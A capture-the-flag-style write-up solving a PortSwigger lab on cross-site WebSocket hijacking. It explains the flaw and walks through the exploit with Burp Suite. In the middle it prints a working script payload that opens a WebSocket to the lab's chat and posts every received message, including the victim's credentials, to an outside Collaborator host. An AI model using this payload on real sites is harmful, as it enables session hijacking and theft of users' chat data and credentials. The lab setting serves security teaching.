Cross-site WebSocket hijacking

Portswigger Lab Solution — Cross-site WebSocket hijacking | Karthikeyan Nagaraj

Karthikeyan Nagaraj
InfoSec Write-ups


What is cross-site WebSocket hijacking?

Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a cross-site request forgery (CSRF) vulnerability on a WebSocket handshake.

It arises when the WebSocket handshake request relies solely on HTTP cookies for session handling and does not contain any CSRF tokens or other unpredictable values.

An attacker can create a malicious web page on their own domain which establishes a cross-site WebSocket connection to the vulnerable application. The application will handle the connection in the context of the victim user’s session with the application.

The attacker’s page can then send arbitrary messages to the server via the connection and read the contents of messages that are received back from the server.

This means that the attacker gains two-way interaction with the compromised application.

Analysis:

1. In Burp Suite, turn Intercept off and turn on the proxy in your browser.

2. On inspecting the HTTP history of the WebSocket, we see that the request has a CSRF token.

3. Copy the Collaborator ID from Burp.

4. Paste the code below into the body of the exploit server, with your WebSocket link and your Collaborator link. Make sure to change the URL from

https://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat to
wss://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat

<script>
  var ws = new WebSocket('wss://your-websocket-url');
  ws.onopen = function() {
    ws.send("READY");
  };
  ws.onmessage = function(event) {
    fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
  };
</script>

Completed Payload

<script>
  var ws = new WebSocket('wss://0a9500cd046a7e4ec152eafb00da000a.web-security-academy.net/chat');
  ws.onopen = function() {
    ws.send("READY");
  };
  ws.onmessage = function(event) {
    fetch('https://ciyjlsw9fxfbd0lw1n56iodvxm3cr1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
  };
</script>

5. Add the required details and click View exploit.

6. We start receiving responses.

7. Click Deliver exploit to victim. You'll notice that we receive requests and responses from the victim that contain the credentials.

8. Solve the lab by logging in with the credentials we found.

Feel free to ask queries via LinkedIn, and to buy me a coffee :)

Thank you for Reading!!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
